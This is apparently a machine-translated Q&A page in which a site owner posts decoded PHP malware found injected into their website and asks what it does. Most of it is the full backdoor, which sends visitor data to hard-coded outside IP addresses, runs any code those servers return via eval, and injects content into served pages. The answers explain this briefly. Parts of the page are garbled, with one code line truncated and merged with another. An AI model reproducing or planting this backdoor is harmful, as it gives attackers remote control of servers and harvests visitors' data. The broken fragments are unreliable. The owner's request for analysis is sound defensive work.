Php 有人能告诉我更多关于这个恶意脚本的信息吗?
这是前几天在一次黑客攻击中被注入我的网站的,我解密后得到: 有人能告诉我它是干什么的吗 编辑:不要访问IP地址,它们可能也是恶意的Php 有人能告诉我更多关于这个恶意脚本的信息吗?,php,code-analysis,malware,Php,Code Analysis,Malware,这是前几天在一次黑客攻击中被注入我的网站的,我解密后得到: 有人能告诉我它是干什么的吗 编辑:不要访问IP地址,它们可能也是恶意的 if (!function_exists(GetMama)){ function opanki($buf){ global $god_mode; str_replace("href","href",strtolower($buf),$cnt_h); str_replace(" 2)&&($cnt
if (!function_exists(GetMama)){
function opanki($buf){
global $god_mode;
str_replace("href","href",strtolower($buf),$cnt_h);
str_replace(" 2)&&($cnt_x == 0)) {
$buf = $god_mode . $buf;
} return $buf;
}
function GetMama(){
$mother = "www.imp3.me";
return $mother;
}
ob_start("opanki");
$show = false;
function ahfudflfzdhfhs($pa){
global $show;
global $god_mode;
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
}
$url = "http://" . $pa . "/opp.php?mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua;
if( function_exists("curl_init") ){
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = curl_exec($ch);
} else {
$ult = @file_get_contents($url);
}
if (strpos($ult,"eval") !== false){
$z = str_replace("eval","",$ult);
eval($z);
$show = true;
return true;
}
if (strpos($ult,"ebna") !== false){
$z = str_replace("ebna","",$ult);
$god_mode = $z;
$show = true;
return true;
} else {
return false;
}
}
$father[] = "146.185.254.245";
$father[] = "31.184.242.103";
$father[] = "91.196.216.148";
$father[] = "91.196.216.49";
foreach($father as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}
}
if ($show === false){
$script='';
$god_mode = $script;
}
}
它从列出的IP地址获取(
file\u get\u contents
)一个文件,并执行(eval
)该文件,该文件可以是任何内容。在服务器上放置更多文件,查找其他漏洞,发送垃圾邮件,托管恶意软件。。任何东西。它将在函数中抛出语法错误。\u exists(GetMama)
@andreas:不,PHP将默认将其视为'GetMama'
,因为PHP很愚蠢。:)别把我妈妈扯进来!它属于